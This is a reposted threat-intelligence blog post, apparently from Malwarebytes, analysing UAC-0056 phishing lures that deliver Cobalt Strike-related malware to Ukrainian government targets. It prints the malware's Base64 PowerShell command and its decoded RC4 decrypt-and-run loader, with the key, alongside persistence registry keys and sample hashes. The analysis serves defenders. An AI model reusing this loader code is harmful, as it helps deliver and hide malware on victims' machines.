{"id":19587,"date":"2022-07-13T09:47:39","date_gmt":"2022-07-13T17:47:39","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/07\/13\/news-13320\/"},"modified":"2022-07-13T09:47:39","modified_gmt":"2022-07-13T17:47:39","slug":"news-13320","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/07\/13\/news-13320\/","title":{"rendered":"Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign"},"content":{"rendered":"

Credit to Author: Threat Intelligence Team| Date: Wed, 13 Jul 2022 16:17:09 +0000<\/strong><\/p>\n

This blog was authored by Roberto Santos and Hossein Jazi<\/em><\/p>\n

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).<\/p>\n

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.<\/p>\n

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.<\/p>\n

Different themes, same techniques<\/h1>\n

Since the publication of our blog post There\u2019s a Go Elephant in the room<\/a><\/em>, we have tracked several new samples as can be seen in the timeline below:<\/p>\n

\"\"<\/a>
Figure 1: Relations between different UAC-0056 attributed samples<\/figcaption><\/figure>\n

Let’s dig further into those relationships. UA-CERT<\/a> has attributed the document named “Information on the availability of vacancies<\/strong> and their staffing.xls<\/em>” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:<\/p>\n

\"\"<\/a>
Figure 2: Detail of Vacancies and GoElephant dropper macros<\/figcaption><\/figure>\n

In the most recent attack reported by UA-CERT<\/a> (Humanitarian catastrophe<\/strong> of Ukraine since February 24, 2022.xls<\/em>) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls<\/em>:<\/p>\n

\"\"<\/a>
Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros<\/figcaption><\/figure>\n

The Help Ukraine<\/strong> lure, to our knowledge, has never been publicly documented before:<\/p>\n

\"\"<\/a>
Figure 4: Help Ukraine lure used in late July<\/figcaption><\/figure>\n

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0<\/a>) that has some similarities with a previous attack:<\/p>\n

\"\"<\/a>
Figure 5: Similarities between different versions<\/figcaption><\/figure>\n

Also, in the past we have found comments regarding to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.<\/p>\n

\"\"<\/a>
Figure 6: Similarities between different versions (2)<\/figcaption><\/figure>\n

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:<\/p>\n

\n

On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine<\/em>!<\/p>\n

Translation of original email sent to victims<\/cite><\/p><\/blockquote>\n

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1<\/a> (Information on the availability of vacancies and their staffing.xls<\/em>). The analysis is still valid for the others, while minor changes exist between samples.<\/p>\n

write.bin<\/h2>\n

The document will download an executable file named write.bin<\/em>. Other attacks following the same scheme used different names for this file, including Office.exe<\/em>, baseupd.exe<\/em> and DataSource.exe<\/em>. The file is slightly obfuscated, and performs the following actions:<\/p>\n

Establishing persistence<\/h2>\n

After some antidebug tricks, the registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRunCheck License<\/code> is used to establish persistence. HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdate Checker<\/code>, is checked first because that was the key used by previous versions of the malware.<\/p>\n

\"\"<\/a>
Figure 7: Run key for persistence<\/figcaption><\/figure>\n

Dropping next stage<\/h2>\n

Next step is dropping a file in C:ProgramDataTRYxaEbX<\/em>.  This file will be used later.<\/p>\n

\"\"<\/a>
Figure 8: Powershell commandline shown in IDA Pro<\/figcaption><\/figure>\n

The payload will execute the following powershell Base64 encoded command:<\/p>\n

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA<\/code><\/p>\n

\"96951aa5-4fab-4188-ad33-d72fcaa7aafe.png<\/a>
Figure 9: Write executable creating the previous detailed powershell command<\/figcaption><\/figure>\n

The chunk before is Base64 encoded; which decodes to:<\/p>\n

$A1 = [System.IO.File]::ReadAllBytes(\"C:ProgramDataTRYxaEbX\");<\/code><\/p>\n

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};<\/code><\/p>\n

$C = (& $A $A1 $B1);<\/code><\/p>\n

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);<\/code><\/p>\n

$E = $E -Split [Environment]::NewLine;<\/code><\/p>\n

foreach($EE in $E){iex $($EE+\";\");};<\/code><\/p>\n

In short the file dropped in C:ProgramDataTRYxaEbX<\/em><\/code> will be decrypted using CmAJngvdDmiTjLxN<\/code> as key using the RC4 algorithm. This next PowerShell script will look like:<\/p>\n

\"\"<\/a>
Figure 10: Decoded PowerShell stage<\/figcaption><\/figure>\n

Here we can see some of the actions that will be taken:<\/p>\n